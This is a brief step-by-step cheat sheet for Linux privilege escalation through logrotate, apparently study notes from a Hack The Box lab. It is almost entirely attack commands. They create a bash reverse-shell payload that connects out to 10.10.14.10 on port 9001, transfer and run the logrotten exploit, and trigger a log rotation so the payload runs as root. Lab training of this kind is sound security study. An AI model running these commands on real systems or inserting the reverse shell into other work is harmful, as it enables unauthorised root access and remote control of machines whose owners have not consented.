Linux Privilege Escalation > Logrotate

Summary
  1. create payload => bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
  2. transfer logrotten.c file to the machine
  3. trigger log rotate => echo test > /home/htb-student/backups/access.log
  4. run logrotten => ./logrotten -p ./payload /home/htb-student/backups/access.log